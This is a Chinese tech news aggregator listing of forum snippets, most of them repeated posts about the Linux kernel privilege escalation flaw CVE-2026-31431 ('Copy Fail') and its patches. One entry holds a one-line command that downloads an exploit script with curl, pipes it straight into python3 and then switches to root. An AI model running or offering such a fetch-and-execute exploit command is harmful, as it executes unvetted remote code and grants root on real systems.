PY - 钛刻 - 科技风向旗 - 深度刻画技术趋势,引领数字未来 - 第2页 - 钛刻科技 | TCTI.cn

PY - 钛刻 - 科技风向旗 - 深度刻画技术趋势,引领数字未来 - 第2页 - 钛刻科技 | TCTI.cn - 钛刻 (TCTI.cn) 为您提供最前沿的硬核科技资讯、深度评测和未来技术趋势分析。

共 173 篇相关文章 · 第 2 / 9 页

Linux 提权漏洞,试了一下,还真的可以

curl https://copy.fail/exp | python3 && su 6 个帖子 - 5 位参与者 阅读完整话题

tech linux.do 2026-05-01 14:56:45+08:00

[推广] [一个“去重”写了 20 种方法?盘点 Python 列表去重的奇技淫巧]

想起茴香的茴子有四种写法,孔乙己先生是高明的,他如果生在这个时代,就能用不同的思路让 AI 帮他解决问题了。 Python 列表去重的 20 种实现方式 列表(数组)去重是最常见的算法,非常简单,但不同实现方式背后的差异巨大。AI 时代,可以不手写代码了,但需要知道代码背后的原理

tech v2ex.com 2026-05-01 09:56:09+08:00

记录一下PyInstaller + GUI 脚本执行踩坑全记录

最近在做一个 PyInstaller 打包 + tkinter GUI 的项目,踩了不少坑,整理出来给佬们避雷。 背景 项目结构大致是:GUI 主程序负责界面和交互,动态执行一个打包进去的 Python 脚本, 脚本的 sys.stdout / sys.stderr 重定向到 G

tech linux.do 2026-05-01 02:54:16+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 23:47:00+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 23:47:00+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 23:47:00+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 22:47:00+08:00

【PY.KG】未来的计划需要大家的投票

各位晚上好: PY.KG距离开放以来已经快四个月了。目前注册人数和正在使用的域名不多也不少。因为目前PY.KG并不被广泛的认为是一个根域,PY.KG NIC也不是一个规范的注册局,出于对所有使用者的,当前域名使用有一堆限制,以至于该子域名并不如预期那样使用广泛。我相信这不仅困扰着

tech linux.do 2026-04-30 22:45:05+08:00

happy是什么

我看有佬开发那种手机控制去vibecoding 我也差不多吧,我说下我的方案 juicessh+tmux解决 termux体验感不太好,happy我听说过,不知道是什么,… 我看了看cc-web开源项目(站内) 感觉就是可视化的tmux,而且juicessh最舒服的就是可以看见每

tech linux.do 2026-04-30 22:33:23+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 21:47:00+08:00

CVE-2026-31431 主要Linux发行版已在2026年4月下旬发布补丁

CVE-2026-31431,也被称为“ Copy Fail ”,是一个影响广泛的 Linux内核本地权限提升漏洞 。它的CVSS评分高达 7.8 (高危),攻击者仅需利用一个逻辑缺陷,就可能在几毫秒内从普通用户提升至root权限,且利用过程稳定,无需任何复杂的条件。 该漏洞源于

tech linux.do 2026-04-30 21:32:14+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 20:47:00+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 20:18:55+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 20:18:55+08:00

[分享创造] [分享创造] noni — 让 AI agent 也能跑 `gh auth login` / `ssh-copy-id` 这类交互式 CLI

做了个小工具叫 noni ,开源在 GitHub: https://github.com/williamwa/noni 解决什么问题 gh auth login 、 ssh-copy-id 、 npm publish 、 npm login 这些命令默认是交互式的,默认有一个 T

tech v2ex.com 2026-04-30 19:36:42+08:00

Ubuntu 高危漏洞

[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De

tech www.v2ex.com 2026-04-30 18:05:25+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 17:43:59+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 17:43:59+08:00

刚刚爆了一个影响 17 年后所有 Linux 内核的本地提权漏洞 CVE-2026-31431 / Copy Fail,尽快排查

详情 (不确定这个网站靠不靠谱): https://copy.fail/ 这是 HN 上的讨论: https://news.ycombinator.com/item?id=47952181 各家的报告: https://access.redhat.com/security/cve

tech www.v2ex.com 2026-04-30 17:09:49+08:00

Ubuntu 高危漏洞

[高危] CVE-2026-31431 ( Copy Fail )本地提权漏洞 https://ubuntu.com/security/CVE-2026-31431 一行命令就能从普通用户变成 root ,影响 2017 年至今几乎所有 Linux 发行版( Ubuntu 、De

tech www.v2ex.com 2026-04-30 17:05:25+08:00